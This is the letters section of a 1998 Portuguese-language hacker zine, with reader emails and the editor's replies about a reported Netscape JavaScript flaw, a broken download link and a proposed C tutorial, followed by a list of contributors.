> hmmmm! Tu jah viu o Correio do Povo de ontem (domingo) secao informatica???
> Pega ai uns trecho:
>
> "PRODUTOS DA NETSCAPE TEM FALHA DE SEGURANCA
> Uma falha potencialmente seria foi descoberta na linguagem de programacao
>usada nos programas Communicator e Navigator (...)
> O defeito pode garantir a um hacker o acesso a algumas informacoes contidas
>no HD do usuario. A falha (...) pode ser explorada pela linguagem de progra-
>macao Javascript (...).
> (...) testou a falha em varios programas navigator e communicator, ate a
>versao + nova do communicator, o 4.5, e encontrou o defeito em todas elas
>(...)
> Eles disseram que o defeito também pode ser explorado por e-mails recebido
>pelo programa da netscape (...)"> Eu naum sei sabe como eh, atraves do jornal nunca vamos saber na real como
>eh o Exploit mas tah ai soh por curiosidade caso tu naum tenha lido...
> Hmmm tem bastante gente querendo saber + de Linux meo, + seguranca como
>configurar o sistema e tal, eu por exemplo sou um botsa em mane mal sei me
>conectar na internet e usar BitchX.
> Se tu quiser coloca meu nick na zine como quiser Falow T+!!
> aaahh dah uma chegada lah na minha pagina na minha pagina (under construc-
>tion tah uma merda + vai fica boa)
> http://www.XXXXXXXXX.com/XXXXXXXX/XXXXXXXX/XXX
-=-=-=-=-=-=-=-=-=-
Fala ae kra.
Sabado eu entrei sim na via-rs. Soh que eu costumo soh entrar as 1:30 da noite e fico ateh umas 5:00. Isso vale tambem para as Sextas.
Eu nao assino Correio do Povo, e nao havia lido essa materia. Talvez exista mesmo esses bugz no JavaScript mas nao sei neh?? Outro dia entrei numa page que apenas mostrava infos do usuario. Tipo..sistema, Browser . E o kra disia que havia invadido o meu HD.
Hehehe. Isso nao e' nada de tao interesante. Qquer um pode colocar coisas assim na sua page. Vai ver os caras entraram nessa page e começaram a inventar coisas. Sabe como e' reporter ne'.
Ainda nao cheguei na tua HP. Pois me conectei por 5 minutinhos apenas para pegar esses emails. Mas juro que da proxima vez passo lah.
From: XXXXXXX@ThePentagon.com
Date: Sun, 04 Oct 1998 22:08:13 -0300
Subject: Errinho no link
>Hey mano..
>
> Acho interessante essa sua zine. Talvez eu faça uma materia um dia e
>tal..
> O fato eh que o Hacker Book versão 1.1 esta com um link invalido. Como
>gostaria de pega-lo, deixo assim a minha msg.
>
>cya
>--XxxxXxxx
-=-=-=-=-=-=-=-
Aham.
Prometo que pelo menos ateh sabado, ou sexta a noite, jah estara tudo funcionando. O HackerBook e' uma uniao das primeiras zines. Se voce jah as leu, nao encontrará muita coisa nova.
E' bom ter ele em maos, porque as materias lah tao completas, em quanto na zine eles se dividem quando sao muito grandes.
Tipo.. A historia de mitnick escrita por Marcus H¸bner lah se enconta completa, em quanto nas zines estah divido em algumas partes.
Em quanto a materia.. Pode mandar que a zine esta meio "Atrazando" por causa disso mesmo.
Date: Sun, 04 Oct 1998 17:07:18 -0300
From: XXXXXX@urbi.com.br
Subject: programacao/zine
> vc ainda esta querendo o tutorial sobre programacao em c pra zine ? talvez
>eu possa comecar escrevendo, se ficar bom eu continuo. acho q dah pra
>escrever semanalmente. retorna o mail pra eu saber.
-=-=-=-=-=-=-=-=-=-=-
Quero sim kra.
Eu jah havia me esquecido de que havia prometido um tutorial de C.
Ateh comecei, mas isso se esqueceu com o tempo..
Pode mandar as partes do tutorial que isso e' uma das principais coisas que eu procuro. A secao Programacao tah reservada pra ti okz?
Os autores dessa edicao foram:
Derneval (Kevin Mitnick) - barataeletrica@thepentagon.com
Simon Phoenix (VIRII) - ??????????????????
spectro (Invasao de Privacidade) - spectro@deathsdoor.com
Gostariade mencionar os seguintes nomes(alem desses):
- [LuCiFeR]
- |zERo|
- AcidBrain
- Almeida
Acho que e' soh.